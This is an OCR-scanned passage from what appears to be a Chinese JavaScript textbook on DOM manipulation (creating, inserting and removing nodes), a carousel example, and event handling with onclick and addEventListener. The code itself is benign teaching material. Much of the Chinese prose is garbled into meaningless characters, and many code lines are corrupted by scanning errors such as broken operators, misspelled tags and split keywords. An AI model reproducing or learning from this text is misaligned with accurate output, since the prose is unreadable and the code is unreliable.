//f#i Jil document. createElement ( 'button') ] %
var button = document. createElement( 'button')
console. log(button) //< button ></button >
button. innerText = '—IE4"
button. id = 'btn'

//3RH body Y DOM Xif £
var body = document. body
/ /¥4 AN 4T 1< button >TT F 18 M < body > fi 5 — L &
body. append(button)
</script >
</body >
</html >

0 S5 2% APT B8 A9 00 BIA RS E DOM 4 v, BT LIRS 2 15 50 1 Ji /s o 1 81094 A< X
4. append (JLF) "I . BB 1 70 T A S GE IR X 45 2 . &l 3-5 B,

WIEE 3-5 PR, S KBGO 2 A< button >FRERAWHRME T RE K
JavaScript JIAR 2 J5 . X (F 2 append O BREEA . LRI £ 5 AU LG BB
B 7 2 Sk ke I S, )5 8K TG 3 AN 3] 58355 Ab B, BT D) Y s o AR AL T AR TS A B O R Y
APL ARSI

<I—— 55 3 F 3.1.4 WA AMEML TAEFR E AL E IR MOC R 1Y APT ——>
<!DOCTYPE html >
< html lang = "en">
< head >
< meta charset = "UTF - 8">
< meta http — equiv = "X - UA — Compatible" content = "IE = edge">
< meta name = "viewport" content = "width = device — width, initial — scale=1.0">
< title > Document </title >
</head >
< body >
<div id = "box">
< div class = "xx">|</div >
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< button id = "btn">— 4 </button >
</div>

< script >

var button = document.createElement( 'button')

button. innerText = '#iifi AL

button. id = 'btnl'

var box = document.getElementById( 'box')
/15845 . insertBefore( Hfr G K, % G K)
box. insertBefore(button, btn)

</script >
</body >
</htnl >
r L]
o0 e

@ Document x +

C ¢ © 127.0.0.1:5500/53%%203.1.4%20i .. ¢ * O &

HOER @ EE-T o hao123 I RUSM nrme @ ERess

»

g & dl Elements » 0 : X
<l—— H3® 3.1.4 { <body>Pilin—7iRd -

-

<html lang="en">
* <head>..</head>
¥ <body>
* <script>.</script>
<button id="btn">—7#Hfl</button>
== 5@
<!=-— Code injected by live-server —>
» <script=_</script>
</body>
</html>

html body button#btn
Styles Computed Layout »

Filter thov .cls +, & [4]

element.style {
}
button {

appearance: auto;

writing-mode: horizontal-tb !iImportant;
font-style: ;

font-variant-ligatures: ;

P 3-5 7O H B I0 R A S OB I E 6 5N w8 B 4

user agent stylesheet

)

insertBefore O R E 2 . FFHEMF AP NE HICE , A BN E RN T E WAL &,
HEFREEANCHITENHA — A0 DOM T &, B LLFE i % API B, 75 25515 3

THATTR LT R, 5 B ok 2 % 0 B 1 S 56 J0 R e &4 RE 58 AL 48 7€ A B 4l A
TLE,

2. M HTML 3244 i B 45 EE B9 DOM 5 =
BESR DOM #8AF AT DLSE SR B, Q) i & 38 DOM 5 1, I8 2 30 58 g — 2 e $2 44 1 M B
58 E DOM JTR M UIaE . M ERE & DOM JT R 19 I A8 Y i 11 7 =0 e s ok . AU an
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<t-— #B 3 F 3.1.4 WYL AMRML T ESS AL B MR TR Y APT ——>
<!DOCTYPE html >
< html lang= "en">
< head >
< meta charset = "UTF — 8">
< meta http — equiv = "X - UA — Compatible" content = "IE = edge">
< meta name = "viewport" content = "width = device — width, initial — scale=1.0">
< title> Document </title>
</head >
< body >
<div id = "box">
<div class = "xx">|</div >
< button id = "btn">—#% 4 </button >
< button id = "btnl">% — 3% £ </button >
</div>
< script >
var btn = document. getElementById( 'btn')

/7 ITER A BKR B A BT R XL TR I
btn. parentNode. removeChild(btn)
[/ TT R 4 MR AT T &R
var btnl = document. querySelector('# btnl')
box. removeChild(btnl)
</script >
</body >
</html >

B R AL M ER DOM JTER A APT I AN B H2 4% A B BR 095 5500 42 5 1 2 75 2 4%
FHAY SMSE XL A BEMERTE ER DOM T X, XHE AT UM BT, B 7 g
[ B S 7R A7 HL G ZR [, 0 AT LB B2 MR AL Je R 15 4, I8 removeChild O pR 50k M B+
TCER . A A HEMBR TR WA LA ST R B9 parentNode J& P 30 25 M 3R BCE N [ o0 &=
AR TEE , LUK JE ] removeChild O $UAT M 5 B 45 ,

2 TMERITER M APT L2 R B 45 1950 5T E , 7T LU i DOM R /9 KE 4k ok e
R QR 3-6 s,

SEBR B DOM 5 S BR A Y T AT ZE R 50 R N DOM B i & 7F ok, 33 B 78 W 1T v
S FE WHEMER TR T T UNBR TR A i 7R 2 LR LA 3R .

(1) FEWBEES 1 DOM 4 b 4% 2 Z M BR i B AR T &

(2) FENEMERA B TR WAL ITER,

(3) WAL ITCR S BT EZ Mg LR,

(4 TENAFHEIS N DOM B #E Rk HiR T E .,

3.1.5 DOM #5114 2)

W F P2 ALY DOM #24F APT Fh 2 B Z(HAEH] ) 50, 72 SE PR U H T 2 i s b il R
I3z A RE S 45 LR R A {8 i LU ROk L Tl S T R — AN 25 A 2 I 5 DOM #:A4E 52 3L
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ST IR

24717 H 1
JIEHE ST
;;-:—rrfwn-ux

[ meta ] [ title ] - .

14k 3 SRR
% 5

1 3-6 MIBRIGER B9 APT i 224 2 M R B b5 9 50T %

A SHAT M, R IRA 2% > DOM #:4E 1 R s .

1. REIMERSH

P H H R R Y S R 3 s b VR SRR T P 46 K 22 B N A2 fl i 3R v 5 S AT
ifie. & SAT DneE F W R o F R B TR . H L0 R 3 158 HCE AE N T A 1Y banner
L E L 3-7 s,

@8 ® @ pocument x4 ~

» C O @ 127.0.0.1:5500/test.html % 0O &
HOEA f SE-T of heot2s £ AuSH [E srew [E ARees S RBECLERE-B. »
% 0] Eements » g o x

<html lang="en">
* <head>.</head>
¥ <body>
vadiv class="swiper"> flex

g _E <div class="swiper-item a"> W—GE
</div>

<div class="swiper-item b"> M_EH

</div=
- <div class="swiper-item c"> E=WE
@ </div=
¥ ediv class="paganition"> flex
== 5@

Wiml body  civawiper | dhpagantion]
Styles Computed Layout »
Filter thov .cls +, @ [&]

element.style {

.swiper .paganition { test.html:36
position: absolute;
bottom: @px;
width: 100%;
display: flex; &
justify-content: center;
3 padding: » 15px @px;

div { user agent stylesheet
iy

position 154

B 3-7 i UL S0 K T 38 R A2 N ALY banner i B
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MRAEE 3-7 M, — A 5E B 1E BATRORFEH AR S 24 K SCA 2l — b
1 5 B HURE s — 5K I S0, S KT B o E) i 7 B R AEAE 3 DURR s A A T WA A >
I A e P S P A R R A T ST

A JR B 7€ 4 5 o E AT IO T EEH A A S U4 09 D B8 (8] B8 — 2 I 1] 1) 48 Xof 10 1) A L
B A T RE I B AR A A H AT A B AR A S T 2 setInterval O,

2. B BRPEXNFE

IR OR G AEHEN T RS — B, BEXE ST R R R B, B SE SE BLE S AT
) HTML JG 3R 9 4 Jmy B L CSS #ER it AR an T .

<!=— 5§ 3% 3.1.5 GEETHY HIML ST R 194 5 & K css et ——>
<!DOCTYPE html >
< html lang= "en">
< head >
< meta charset = "UTF — 8">
< meta http — equiv = "X - UA — Compatible" content = "IE = edge">
< meta name = "viewport" content = "width = device — width, initial — scale=1.0">
< title> Document </title>
< style>
. swiper{

position: relative;
}
. swiper . swiper — wrapper({
display: flex;
flex — direction: row;
overflow: hidden;
}
. swiper . swiper — item{
flex — grow: 1;
flex — shrink: 0;
width: 100 % ;
}
. swiper — item{
height: 200px;
text —align: center;
line — height: 200px;
font — size: 30px;
font — weight: bold;
}
.af
background — color: blanchedalmond;
}
. b{
background — color: aquamarine;
}
.cf
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background — color: darkorange;
}
. swiper . paganition{

position: absolute;

bottom: Opx;

width: 100 % ;

display: flex;

justify — content: center;

padding: 15px Opx;

}

. swiper .paganition .point{
width: 16px;
height: 16px;
border — radius: 100 % ;
background — color: lightgray;
opacity: 0.5;
margin:O0px 5px;
cursor: pointer;

}

. swiper .paganition .point.active({
background — color: lightskyblue;
opacity: 0.9;

}

</style>
</head >
< body >
< div class = "swiper">
< div class = "swiper — wrapper">
< div class = "swiper — item a">
55— &l
</div >
< div class = "swiper — item b">
5 iR
</div>
< div class = "swiper — item c">
5=
</div >
</div>

< div class = "paganition">
< div class = "point active"></div>
< div class = "point"></div>
< div class = "point"></div>
</div>
</div>
< script >
function Swiper(args) {
var height = args. height||'200px'
var interval = args. intervall |1000
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var el = args.el

1
</script >
</body >
</html >

S I ok A v R R R R T R AT AR P S RN 12 S S 3R S Y U ) A A SRy R
AL TR LAl A A JavaScript A5, 13X FE A BEZ A K N A9 T B 98 ¥ .

3. ZEERHEE DOM BIEX M EDNTMIEH

TR EEHERFERINEER JavaScript fUHS , B A~ 2 4 5¢ 4 55 F /i 1 3 7 7 19 217
S B RE N T X B DOM #4E ARES I F

<I-— %8 33 3.1.5 WML K TR JavaScript A% ——>
<!DOCTYPE html >
< html lang= "en">
< head >
< meta charset = "UTF - 8">
< meta http — equiv = "X - UA — Compatible" content = "IE = edge">
< meta name = "viewport" content = "width = device — width, initial — scale=1.0">
< title> Document </title>
< style>
. swiper{

position: relative;

}

. swiper . swiper — wrapper{
display: flex;
flex — direction: row;
overflow: hidden;

}

. swiper . swiper — item{
flex — grow: 1;
flex — shrink: 0;
width: 100 % ;

}

. swiper — item{
height: 200px;
text —align: center;
line — height: 200px;
font — size: 30px;
font — weight: bold;

}

.af
background — color: blanchedalmond;

}

. b{
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background — color: aquamarine;

}

.cf
background — color: darkorange;

}

. swiper .paganition{
position: absolute;
bottom: Opx;
width: 100 % ;
display: flex;
justify — content: center;
padding: 15px Opx;

}

. swiper .paganition .point{
width: 16px;
height: 16px;
border — radius: 100 % ;
background — color: lightgray;
opacity: 0.5;
margin:Opx 5px;
cursor: pointer;

}

. swiper .paganition .point.active{
background — color: lightskyblue;
opacity: 0.9;

}

</style>
</head >
< body >
<div id="s" class = "swiper">
< div class = "swiper — wrapper">
< div class = "swiper — item a">
55— IR &
</div>
< div class = "swiper — item b">
5 IR E
</div >
< div class = "swiper — item c">
5 =R
</div>
</div>
</div>
< script >

//Swiper % 4

/ *
args: {

el:'H#r swiper [ CSS ik ##s ',
height : 'swiper & B, ZR1A Ny 200px’,
interval : "#¢ 4% 1 B] g B (6], BRIA A 2000ms ',
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defaultIndex: 'BRIA /R 58 JL IR #6475 &1, BRI H 0!
}
v/
function Swiper(args) {
/19 R4 R S8
var el = args.el
var elem = document.querySelector(el)
var height = args. height||'200px'
var interval = args. intervall |2000
var defaultIndex = args.defaultIndex| |0
/19154 swiper B PIHEIC R BB

var nodeList = []

//3RB el F 1Y wrapper X} 4
var wrapper = document.querySelector(el + '. swiper — wrapper')
/1B R XT LRI A wrapper Xf 4
wrapper. childNodes. forEach(function(swiperItem, index) {
if(swiperItem. nodeType == 1&&swiperItem.className. indexOf( 'swiper — item')!= —1){
nodel.ist. push(swiperItem)
}
})
/15y BT #s % 5
var paganition
/1016 A 43 DU LA
function initPaganition(nodeList, defaultIndex) {
//BIEE—4 div T
paganition = document.createElement('div')
/735 H AR
paganition.className = 'paganition'
nodeList. forEach(function(swiperItem, index) {
var paganitionItem = document.createElement( 'div')

var className = 'point'
if(index == defaultIndex) {
className = className + 'active'

/AR ST B ARG A 3R 3 B B3RO R S
scrol1To(wrapper, defaultIndex)
}
paganitionItem. className = className
paganition. appendChild(paganitionItemn)
1)
/184 53 U X 52 028 3] 48 375 e % 52 v
elem. appendChild(paganition)
}
/¥ TCFR A SR 3 B 48 E L
function scrollTo(elenm, targetIndex) {
nodeList. forEach(function(swiperItem, index) {
if(index == targetIndex){
elem. scrollTo( {
left:swiperItem. offsetLeft,
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behavior: 'smooth'
1)
}
)

for(var 1 = 0;1< paganition.children. length; i++){

paganition. children[i].className = 'point'
}
try{
paganition. children[ targetIndex].className = 'point active'
}catch(e){
}
}
/IR AE I B SR )

function startInterval(elem) {
var index = defaultIndex+ 1
var length = nodeList. length
setInterval (function( ) {
scrollTo(elem, index)
index++
if(index == length){
index = 0
}
}, interval)
}
/78 IR0 46 A6 43 BT 4 PR AR
initPaganition(nodeList, defaultIndex)
/7 Ja 3 e 1% 1#

startInterval (wrapper)

}
VLN R R A SPOES
new Swiper( {
el:'#s',
height: '250px"',
defaultIndex:1
1)
</script >
</body >
</html >

3.2 DOM EH4HE

3.1 WNAETEZENG T DOM #AE K HF I S 9 220 i 1 27 > DOM #:4F 2 220
MBI RA T 912 IR H R 248 DOM B Tk L MR RN L EIF R, &
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% 3.1 WRHIB 2R IAUH DOM #:4F APT, UL RETC & A I 5 58 B — L8 9 51w 14 3l 2524
RO R RGBT RGP B EHE

3.2.1 HMRENS

AR I FE I R GE N AR W SR B K 2 A SR . &R G B R L T DL DA by
O S AFABC DR 40 AP A 0T b B — A L e s — A R HE R ) 1 X A B
PE. TEHETORM N A THE — 2856 T F R p9 5 2 &, JF EOLSE B AR 50 4% b J2 dnfey
BATHY .
AU T B B A L F e AR g R I R G Kk AR I S AR B R AR S L R G SRS
PRI 7= A B & HE AR L 0T HL A ghm #E R s 4 () iz 47 — 260D AL 4 an e — A
BLS Y B G B 58 B RAL T DU RN, TRAT BB — N E S T IR iR 6
1E Web JF % b5t v, S 76 30 58 4% 20 100 b ok k. HL3E 5 48 %2 2 8 1N 31 9 4 E 7
gr: AR —DICR . — RICR BN BB XA DA HTML ACRS 505 R A3 W48 8 1
28 JUAS AT BE & AR B A ) A
(D P AERA TR ol R s 505 .
(2) Pl B
(30 JH = 9] 255 Do) i 458 1) R/ DN 8 S AT ) W i 7 11
(4) —A BT4s k4,
(5) xR M,
(6) &5 O AL
(1) KR,
BT E AR A — A A B a0 T Ak R i 2 is AT AR e, M E X
T A Ik 7 A 4 O B AR B A S T T A A B AR . R SR AR
A I A PR T L AT OR3P A 44 T R (R A A A A B AR B 1 T
AL WS T AR R R S R SRS A PR 2 R A Y K AR A Tl
1. = 1 EErflF
BT ORBE — AR B 5 AR TR 5 rh, i R A — A < button > 4], K
I 75 52 28 BB ALY —F g 65, AR QR
<I-— 3 F 3.2.1 HRSBMEILN—fEeE ——>
<! DOCTYPE html >
< html lang = "en">
< head >
< meta charset = "UTF - 8">
< meta http — equiv = "X — UA — Compatible" content = "IE = edge">
< meta name = "viewport" content = "width = device - width, initial — scale=1.0">
< title > Document </title>

</head >
< body >
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< button > Change color </button >
< script >
/ /3R B button #4
var btn = document. querySelector( 'button');
/17 SCHEHLET R %X
function random(number) {
return Math. floor(Math. random() * (number +1));
}
/728 btn Xt R 48 % Wi F A, FEFE AN B function S B AT
btn.onclick = function() {

//H B rgb(0~255,0~255, 0~255) 1 & o X i

var rndCol = 'rgb(' + random(255) + ',' + random(255) + ',' + random(255) + ')';
/ /BB body fi #E =X
document. body. style. backgroundColor = rndCol;
}
</script >
</body >
</html >

f#i F document. querySelector ) pR ALK B 41 9 DOM 5 45 318 AR FFE btn Z8 1,
FET R E LT — AR 18] B AL 1 pRE ARG 1Y 5 =3 0 2 S AL B A% . btn B4R ] <
button> JCEK ,7E < button > XFXF R L 7] fil & — FR 5 F A4, PRt o wT DA i =5 1 Ak B 2%
T8 B — A~ B 44 R G A oR B0 45 A il B AL €2 0T I 26 5 S5t 6 ) AR (B 46 - B i
AL AR S B I B XA g
HZERHFMFE< button >0 FR il & % B ARG B 2 8 AT . BB 25 H P B E 1, 4
17 Jﬂ:fﬂﬁﬁfﬂ
2. XARNEAEMT £
ﬁﬁ%’“‘{i%%%#x%ﬂﬁ JavaScript ffi FH=F . K2 ARG S A X FHLE I B el
B TAE )7 2R 6 T JavaScript, SEBR_E,JavaScript B 5T _E 89 254 HLH A [6] T 76 FoAth 21 5% op
By AL

B 4n , Node. js J&—FpEH WAT B VR TF & & 1 JTavaScript > 8 i P 2% i1 iz 55 i viig 1
HBYIEFT ¥ 5L . Node. js event model H g Wi W S5 4 1Y 1 Wr 45 A1 7 1 40 23 < 14 1) b 2
i BRI ER IR 228 2 AH RS2 B AR 2 AR 5 AN [F Y . Node. js i IR onO X
FF 1 oA EIOK 1 M — A 2 W 0T 2% 6 once O 3XFE (14 3R BOKR FEMH— A TEI2 17— IR Z 5 A
) W T 245

FHN— A F . A LU JavaScript & I & 85 30 U 2% 09 48 14 . W4 A WebExtensions
TERBEA ARSI R0 3 18 AR T S AR AR 8 AT — s AN (] 0 B W s e 2 DR B e
A9 (4 onMessage T A& onmessage) , B 75 2 5 addListener PREIZE G .

IUAEA TG SR Se g, DL E 4k AR R WA [R] 1 g B2 2R 58 T FAFHLH 2 AR Y .

2
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3.2.2 EHEMHE A

T T HAF AT R R T R gk Ak it W BT % 9 5% o B S0 9 O X R
RN

1. SMEHHRETR

HTML JC & S ZEAS (19 3510 48 5 77 0% A B 1 2 11 28 5 J7 20 DUBT X 2 61 1) 30 ol =4
@ ARSI

<!—— #5373 3.2.2 LU XHEH Y S A B - >
<!DOCTYPE html >
< html lang = "en">
< head >
< meta charset = "UTF - 8">
< meta http — equiv = "X - UA — Compatible" content = "IE = edge">
< meta name = "viewport" content = "width = device — width, initial — scale=1.0">
< title> Document </title>
</head >
< body >
<U—— ¥4 B AFAE onclick @Mk, Y ERHT LA B pR AL () " W W B A —— >
< button onclick = "handleClick()">#%4H 1 </button >
<!=— [A]—A> onclick Jg ¥ T LLE i 12 543 I8 , 4858 24> sREL, AN AT LIMEAS B ——>
< button onclick = "handleClickl (1), handleClick2(this)">#4H 2 </button >
< script >

function handleClick(){
console. log( "BE R4 ")
}
//>4 handleClickl (1) AT 0}, arg FI(E N 1
function handleClickl (arg) {
console. log(arg) //1
console. log( "M FH {4 1)
}
//% handleClick2(this) 47 i, btn A %4 1Y) DOM Xf 42
function handleClick2 (btn) {
console. log(btn) //< button onclick = "handleClickl (1), handleClick2(this)">
/ /¥4 2 </button >
console. log( "B d; F 4 2")
}
</script >
</body >
</html >

1€ CHFAT R I7 3 78 SEBR I R 37 5 vh JF AN o O BLAFAEAR 22 B . ) an /e HTML
P2 LS JavaScript BY eRECHE TR 5, /\@*; HTML 5 JavaScript %7 4 2 )2 1 A7 75 Fl
G o HETXE AZESF, By LAATE SEBRIT & i), 285 Sl i JavaScript 2880 DOM X 4, #25 DOM
ST E JavaScript H4 BN .
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<!—— %833 3.2.2 @it JavaScript 3k HX DOM X} 4, iy DOM Xf R 4 % JavaScript H{f ——>
<!DOCTYPE html >
< html lang= "en">

< head >
< meta charset = "UTF - 8">
< meta http — equiv = "X - UA — Compatible" content = "IE = edge">
< meta name = "viewport" content = "width = device — width, initial — scale=1.0">
< title> Document </title>
</head >

< body >
< button id = "btn"># 4l </button >
< script >

var btn = document.getElementById( 'btn')

function handleClick(event) {
VXL GEA
console. log(event)
/3R B fih i 12 2421 (1) DOM X 52
var target = event. target
//btn Xt £ 5 target Ny [7] —A~XF 4
console. log(btn === target) //true
}
/B ST, B btn 41 H BN S ELE
var backgroundColor = document.defaultView. getComputedStyle(btn).backgroundColor
/1% 45 e B S A
btn.onclick = handleClick
11 0¥ 95 % BUbs B A 44
btn. onmouseover = function (event) {
/125 B CAE L B e 4 4 AR
btn. style. backgroundColor = 'lightblue'
}
/1 R ¥ S8 5 B bR A Hh
btn. onmouseout = function (event) {
/125 B 5% 42 AL e £ 1k 2 BRI TS S B
btn. style. backgroundColor = backgroundColor
}
110 ¥ 98 % BUbs B 2 3 44
btn. onmousemove = function(event)
console. log( ' AR s34 ")
}
/1 R ¥ S8 5 B s % 3 3 44
btn. onmouseup = function(event) {
console. log( 'l Am AL I it 1)
}
/1R AE 8 7 RAT % 2 A
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btn. onmousedown = function(event)
console. log( ' FR#% T B i ')

1

/1 ¥ 95 78 Wk F A4

btn. ondblclick = function(event)
console. log( 'MW ;")
}

</script >
</body >

</html >

il DOM X 2 1Y onclick J& PSP € T4 5 HEAEAT NI S-S5 AR W] B %007
Al DLW b 73 25 JavaScript 5§ HTML 53 . BRS040, 30 0T DI ) 4240 45 56 45 b BUbs =
8 AN ) Y A S A A5 B ik e N AILERAT o AT AT S0 sR B BOA S Hh L S — A
event X R, LN AL & S F b BT A 1S4 BRI U7 XA 2% https://developer.
mozilla. org/zh-CN/docs/Web/API/Event Xt FH4: X R AN 44,

2. BIEEHBWES

EventTarget # AT L 2205055 14 52 0, th wT DA el A0 2 T W 6% A9 0F S S . 464 37 it
AT HARER 22 92 B0 53208 LA G R 3X 3 FhoT i,

element S H 3l . document Fl window & # WL A A5 H Aw o {0 H A x5 g2t v] DL 25
fEHFR, #lin XMLHttpRequest,AudioNode #l AudioContext %,

L2 HE M H IR (B35 element.document Fl window) 3 5718 i3 onevent 4514 1 & 1 1 &
A PR

EventTarget. addEventListener O 5 648 € B9 W T 28 1 W1 3] EventTarget [, 24957
S fih A 8 W A I 8 0 1 1 eR RO S g AT . EAE B AR AT DR — A SO BT R
element,document Fl window , 0] LLRAT ] 32 ¢ 2f 78 i X 42 (il 40 XML HttpRequest) ,

He## /] addEventListener O R 7 — S {4 W W &% B Q0 °F -

(D BERVFN—DEMRMEZ A WIS . R X FE JavaScript £ F1H A 75 2 45
15 =7 e /A A i AR R kL X — D REAR A H

(2) M T onXYZ @SR R VE, B ME T — Fh SRS 4 1) T BOR#E ) listener 79 i %
W B Ol e P AR 50# D .

(3) EXMEATFIFHRAT R A UE HTML 8 SVG JTTR.

addEventListener O B T/ R ¥ 24 52 B EventListener A R BT EEXT 405 N 298 F & 1Y
EventTarget [ 45 F BRGS0 & 51 R b . A0 R 2245 7 1Y oR BOEO 2 2 &9
JnE) 51 v, D32 pR BB G AN 23 Bl RR R

T R S w1 S R T W A 0 3R U i ak — A BE 44 e OF BLAFE 2 JE AR A e
addEventListener O 2 8 Il — A>Tl g 5¢ 42 A0 [A] (1 B 24 oK &80, W 22 5 19 3 A B 45 oA Bkl 25
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amEs RS AT

<I-- 3 3.2.2 ZIRMXAEL REB SR mE sk ——>
<!DOCTYPE html >
< html lang = "en">
< head >
< meta charset = "UTF - 8">
< meta http — equiv = "X - UA — Compatible" content = "IE = edge">
< meta name = "viewport" content = "width = device — width, initial — scale=1.0">
< title> Document </title>
</head >
< body >
< button id = "btn">#4H 1 </button>
< button id = "btnl">##4l 2 </button >
< script >
//addEventListener () 45 % 1) A FE 45 bR AU 25 B AH 7 35
btn. addEventListener( 'click', function(event) {
console. log( P 1)
console. log(event. target === btn)
1)
btn. addEventListener( 'click', function(event) {
console. log('Hidr 4 2")
console. log(event. target === btn)

)

function handleClick(event) {
console. log('#Ad; FH {4 3')
}
/75 IR — A1 44 PR A2 IR 45 78 I AN 23 (81 5 4 & AT
btnl. addEventListener('click', handleClick)
btnl. addEventListener('click', handleClick)
</script >
</body >
</html >

SR B el FH 52 4R TR R AR A ok a2 S — A B 44 BREI 33X A R BT SR A7 A8 X 1) L ZE 91 A
RN, R AZ T ST B A4 RO R USRI Z M. addEventListener O
i 2 R s AR AR .

addEventListener(type, listener);

addEventListener(type, listener, options);
addEventListener(type, listener, useCapture);

VT B SR

1) type
R W W R 2R RN BUR ) AT
2) listener

24T W T B SRS Y fh 2 s, SR — S AR 0 (SEEE T Event 32 0B XT SO X4
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listener WA JE— I T EventListener 82 X &, 50 & — k. A & B A & /i
15 B T 2 B R U [

3) options Al ik

— 8 E A K listener BYEM AT ES BN S, T HBYEIANT ,

(1) capture Al & — AN JR{H . £ 7R listener 23 76 1% 25 R4 35 {4 47 3K B B A% 45 21 1%
EventTarget i fift % .

(2) once Al #: —/Ai/RKMH . RN listener TEIRINZ JG e 2 R — . W2R A true,
listener W &7 W VH A Z 5 H 3B FR.

(3) passive A[ %k : —PIARE, Y1 E N true I}, 3R listener A2 preventDefaultO),
WA listener 3SR 13X A~ BRI, W25 7 i b 23 2008 © OF 4 il — DS S B, A F
H passive MGERBEVERELL TR £,

(4) signal AJ 3% : 24 AbortSignal B9 abort O J5 B4 8 A BT, WE T #8 29 B 55

4) useCapture A&

— AN IRAE , R 7E DOM B VEME T listener BTG & 556 T8 F i 19 Event Target
JHHIZ listener, 24 useCapture #1X N true BF, ¥ & DOM # [a] F B 1 ZF AR & fil & listener,
M ADILEME T 55— I0FR B TCRER A —F W T — A 4k 2 ek B, B & A 1)
FF B AN AR S PR AN [E) ) AL 3 7 2 SRR R g T IT R DR U
Wk, B fg BT LLAE R DOM Level 3 H 4 & JavaScript F 4T SCR . iR %
A1 E M useCapture ERIN N false,

XFTAE HAR B MR 2R U A T B ARBY B TR 2 B B Bl A 3k
BB o 3 3R B B 1) g0 M T s 23 TE AT A] = 20 9 BB 10 < A2 W O 8 22 Wi B R

3. BHREMHBWE

EventTarget Bt removeEventListener ) J5 7] LI /6 F Event Target . addEventListener () J5
AR, R DU P 0 2 BRS04 (T W i oK BOAS B L DL AT RE 52 e DG BC G AR AY 4% B
A 5 1 8 0T 199 2 5 R b AR I Ik ) S A AT T 8%

28 removeEventListener O B , &% A WIS ECAS 68 F 00 € 24 /i v O 09 4% ) — A4~
FAR W 2% 3 R BN 2 BAR A AE .

WR—A> EventTarget b 534 i W #5785 55 — W Wr #% 40 B2 =5 15 i R B L I B0 A
RER SR f . ANid e TT AR B 90 5E .

A —Fh R S W Wr 2R A0 7 . 1T L) addEventListener () f£ A—-> AbortSignal,
T J5 FE R T A 2 S O il g B9 abort O 7 Bk EI AT,

removeEventListener O (& A Z544 , LR U .

removeEventListener(type, listener);
removeEventListener(type, listener, options);
removeEventListener(type, listener, useCapture);
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ERHI R KRS BT

1) type
— AR RN T E R R A 2
2) listener

7 N H AR A B 0 2R W U 2 pR

3) options A%

— AN F APV B R AE A AT T 5 RTRETAN R .

capture: — DI I/R{A 6 & T B BRI F A7 M5 T 2% R A B i A I & . AR R 48
FE ML S EL MBRINE N false.

4) useCapture A &

— AN IR L 48 8 T R R 1 S W T A R RO A A A AR T A . AR OR IR E SR
WERIAME A false,

e id i addEventListener O BN T —A> A W Wr 4 , 23 76 FL 2045 00 F 77 20 R IR .
R FELAHE A type 1 listener 2503445 removeEventListener() ,fH /& options B,
# useCapture ZHWg?

M A addEventListener O B, W3R options ZHCAIE], W AT PUIAE M [E ) type | 2 KT
S 5] A8 W 0, M — 5 B removeEventListener O Al i) /& capture/useCapture Frii, X4
bR 22015 removeEventListener O (14X b A7 75 DG FC , {H 2 A A (BN 75 22

A F L, B —TF T fY addEventListener O , RIS 41F .

element. addEventListener("mousedown", handleMouseDown, true);

MAERE T TFHEMWA removeEventListener() .S 40T .

element. removeEventListener("mousedown", handleMouseDown, false); /15
element. removeEventListener("mousedown", handleMouseDown, true); /%3

5 1A RO R A useCapture A VLEL, 55 2 I H L), & 4 useCapture
VE e AH 7]
T RMEE LT £ RS T .

element. addEventListener("mousedown", handleMouseDown, { passive: true });

% B, 7E options X% B passive B true, Hifth options Bt B #& BRINA false, R 5
WAL T i Y removeEventListener O 4, 24¥4 capture 3% useCapture fit & K true B}, B R
HEAF R, oAt A # 2 T B . X BB HA capture L #5200 removeEventListener () , 44
T .

//% 3 & 3.2.2 removeEventListener( ) ZE {4
element. removeEventListener("mousedown", handleMouseDown, { passive: true }); [/ 3N
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"

element. removeEventListener("mousedown", handleMouseDown, { capture: false });

n

element. removeEventListener ("mousedown", handleMouseDown, { capture: true });

n

mousedown", handleMouseDown, { passive: false });

"

element. removeEventListener("mousedown", handleMouseDown, false);

"

(
(
element. removeEventListener (
(
(

element. removeEventListener("mousedown", handleMouseDown, true);

(B A5V A 2, — S Y 8 AR K T T A R —

4. FEERANEGENENRGFE

T WG A AR A AT SR 2R AR 2 BRI R S s T iR SRR
1 BWHEHS

(1) onclick: M=k,

(2) ondblclick: A4,

2) EREH®

(1) onblur: K& A,

(2) onfocus: LR REE L,

BRI

<!-- SB35 3.2.2 BAHMRG ——>
<!DOCTYPE html >
< html lang = "en">
< head >
< meta charset = "UTF — 8">
< meta http — equiv = "X - UA — Compatible" content = "IE = edge">

Tir

< meta name = "viewport" content = "width = device — width, initial — scale=1.0">
< title > Document </title>

</head >
< body >
< input type = "text" id = "ipt" placeholder = "iF i A" value = "ERIA(H ">
< script >
ipt. addEventListener( 'focus', function(event) {
console. log(this === ipt) //true
console. log(ipt === event.target) //true
console. log(this. value) 7% SN[
console. log( ' T (1) £ f 7E 51 ARE DY ')

})

ipt. addEventListener( 'blur', function(event) {

console. log('fif AMER E T HE L")

console. log(event. target === this)

1)
</script >
</body >
</html >

3 MEBELEH
{# F onload 5& W, — 4™ Ut i 2{ — 5K FR A fin 2% .

/1153
WS
/1153
/1183
e
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Ik RER VIV EES AN EE I

<I-— 553 F 3.2.2 NI HEN ——>
<!DOCTYPE html >
< html lang = "en">
< head >
< meta charset = "UTF - 8">
< meta http — equiv = "X - UA — Compatible" content = "IE = edge">
< meta name = "viewport" content = "width = device — width, initial — scale=1.0">
< title> Document </title>
< script >
/13 818 bR B 2 A B R AT
window. addEventListener( 'load', function() {
console. log( 'loaded")
/1% R B 25 4515 ) B body TR 4 i A PR 25 48R 52 52 IS $0AT, i AT DAZR B btn JE R
var btn = document.getElementById('btn')
console. log(btn) //< button id = "btn">— 4~ f#4]</button >
1)
// T 47 script FR41E body Z Hil, BT LA AT A5 B DOM B i 4 %) 45 1k
var btn = document. getElementById( 'btn')
//i% btn A null
console. log(btn) //null
</script >
</head >
< body >
< button id = "btn">— 3% £ </button >

</body >
</html >

4) RiEH

(1) onmousedown: FRARFEEBIET .
(2) onmouseup: IR ZEEREITIT,

(3) onmousemove: RAr#iFsl,

(4) onmouseover: RIFBENFEILEZ I,
(5) onmouseout: FIFMNHEITTRIEIT,

5) EHEEMH

(1) onkeydown.: RSB PHE T .
(2) onkeyup: H:AHE S FR BB T,

(3) onkeypress: K&/l &5 He BB 4T I TF .
R A R AR AT

<!—— 3% 3.2.2 MARFLFA R HEH ——>

<! DOCTYPE html >
< html lang = "en">
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< head >
< meta charset = "UTF - 8">
< meta http — equiv = "X - UA — Compatible" content = "IE = edge">
< meta name = "viewport" content = "width = device — width, initial — scale=1.0">
< title > Document </title>
</head >
< body >
< button id = "btn">% 3 </button >
< script >
document. addEventListener( 'keydown', function(event) {
var keyCode = event. keyCode
console. log(keyCode, " # 4% F ')
1)
document. addEventListener( 'keyup', function(event) {
var keyCode = event.keyCode
console. log(keyCode, "#HE L")
1)
document. addEventListener( 'keypress', function(event) {
var keyCode = event.keyCode
